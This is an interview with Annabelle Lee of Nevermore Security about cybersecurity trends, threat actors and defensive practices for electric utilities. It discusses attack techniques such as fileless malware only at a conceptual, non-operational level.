Cybersecurity is a hot topic across national states and businesses. Annabelle Lee, Founder of Rockville based Nevermore Security, tells us more about combating cyber risks in the electric sector.
Nevermore Security specialise in providing cyber security strategy and guidance for the electric sector, identifying tools and techniques that utilities may deploy to identify high priority risks and threats. Founder, Annabelle Lee, discusses cybersecurity trends, challenges faced by the industry and how her innovative organisation identifies high profile risks, provides strategic solutions and ensures the reliability of the electric grid.
What do you see as being the main cyber security trends impacting the electric sector today?
The highest-rated cybersecurity concerns are third-party risks, data breaches and attacks on Internet of Things (IoT) and Operational Technology (OT) assets. These types of security incidents are expected to increase in frequency.
Malware also continues to loom as a primary feature of the threat landscape, but often only as the precursor to an attack, not the ultimate objective. Initial intrusion leads to more sophisticated and stealthy techniques using legitimate tools already present on the target system to accomplish adversary objectives. This approach is called “living off the land.” During early phases of attacks, threat agents increasingly use this methodology, leveraging native system commands, applications, and software to gain access to the system and move throughout the network undetected.
Malware-free attacks are a further attack technique, involving “fileless” exploits where no executable file is written to disk. Attacks are particularly effective at evading traditional antivirus solutions, which look for files saved to disk so they can scan them and determine if they are malicious. Exploits and exploit kits are used to execute attacks directly in memory by exploiting vulnerabilities within an operating system or installed applications and stolen credentials are leveraged for remote logins using known tools. Attackers can then create user accounts that grant them at-will access to systems.
Who are the primary threat agents?
Vulnerabilities are exploited by different threat actors. While there are many threat actors out there today, most of them fit into the following categories.
Government/State Sponsored: Well-funded, often sophisticated, targeted attacks, motivated by political, economic, technical, or military agendas. These often seek competitive information, resources or users who can be exploited.
Organised Crime: Targeted attacks seeking to acquire personal information such as social security numbers, health records and banking information or to hijack and ransom critical digital resources.
Hacktivists: Attacks arising from political agendas, aimed at creating high-profile attacks to promote propaganda or cause damage to organisations hacktivists oppose.
Insider Threat: Typically disgruntled employees or ex-employees seeking revenge or financial gain, sometimes collaborating with other threat actors, such as organised crime or government sponsored hackers.
Opportunistic: Usually amateur criminals driven by the desire for notoriety. They find and expose flaws and exploits in network systems and devices.
Internal User Error: Users making mistakes with configurations owing to design flaws in the network or system, or by the provision of access to unauthorised users, which often results in the breakdown of firewalls, routers, and servers.
Why has cyber security become more critical in the electric sector?
Advancements in technology coupled with an increase in inter-system communications, including the internet, have provided significant benefits to utilities in terms of increased efficiency and lowered costs, yet these changes have led to a significant increase in the exposure of electric utilities and grids to cyber threats and risks.
The current power grid consists of both legacy and next generation technologies. New components operate in conjunction with legacy equipment which lacks cyber security controls. As networking technology has advanced and become more accessible, organisations have integrated systems. With the increase in the use of digital devices, more advanced communications and information technology, the overall attack surface has increased.
Cyber security must address deliberate attacks launched by disgruntled employees and nation states as well as non-malicious cyber security events such as user errors. Since organisations, including utilities, have limited resources, cyber security must be prioritised with the other components of enterprise risk. Cyber security risk is one component of enterprise risk management, which addresses many types of risk (e.g., financial, mission, public perception).
In addition to adequately addressing potential threats and vulnerabilities, cyber security must be included in all phases of the system development life cycle, from the design phase through implementation, operations and maintenance, and disposition/sunset. It must be constantly assessed and revised to address evolving threats, vulnerabilities, and security incidents.
Are there tools available for the electric sector to address cyber security?
There are several tools that are publicly available and there are techniques that utilities may use to address cyber security.
One important approach is to develop a security architecture based on the enterprise architecture which identifies the attack surface and vectors. The more exposed the surface of the system, the greater potential for attack. As the IoT, Industrial Internet of Things (IIoT) and other new technologies proliferate, the attack surface and the number of attack vectors increase.
The basics of user awareness, asset and vulnerability management, and secure configurations continue to serve as the foundation for a strong cybersecurity programne. Organisations should regularly review and improve their standard security controls to include user awareness programmes, asset management and software inventory, vulnerability and patch management as well as multifactor authentication which make it difficult for adversaries to gain access.
What is unique about Nevermore Security’s offering to the sector?
In-depth knowledge and specialist expertise gained throughout a continually changing technical environment. It is essential to understand the distinction of the cybersecurity needs in the electric sector and OT environment as compared to the IT environment, and Nevermore Security has experience in this field.
From a personal perspective, providing technical guidance to the North American Energy Standards Board (NAESB), and participating on the Security Advisory Committees for two US Department of Energy (DoE) laboratories, enables me to keep up to date with current and future cyber security research trends as well as associated potential threats. For the energy sector in particular, this is crucial. Its infrastructure is an extremely complex and critical one with many other industry sectors relying on it for their services. Nevermore Security’s contribution in addressing potential threats and vulnerabilities across entire system lifecycles with efficient strategies and solutions must reflect this.
What do you feel will be the key emerging trends over the next decade, and how will your company aim to respond to them?
The continually changing threat and technology environments in the electric sector pose a significant challenge.
New technology is deployed with legacy devices. Older technology does not address cybersecurity, and it is not possible to “bolt on” cybersecurity. New technology systems must be interconnected, yet this increases the attack surface for malicious actors. The combination of new and legacy technology is a challenge for the electric sector that must ensure the reliability and resiliency of the grid.
Finally, the new OT devices will have a lifetime of 20 to 30 years, unlike the IT devices that are updated in three to five years. This situation requires utilities to consider how to protect systems and devices against future attacks and vulnerabilities. Nevermore Security works with utilities to manage these risks, and we think we will be very busy over the coming years!
For further information relating to Nevermore Security’s cybersecurity offering, please visit: https://www.nevermoresecurity.com/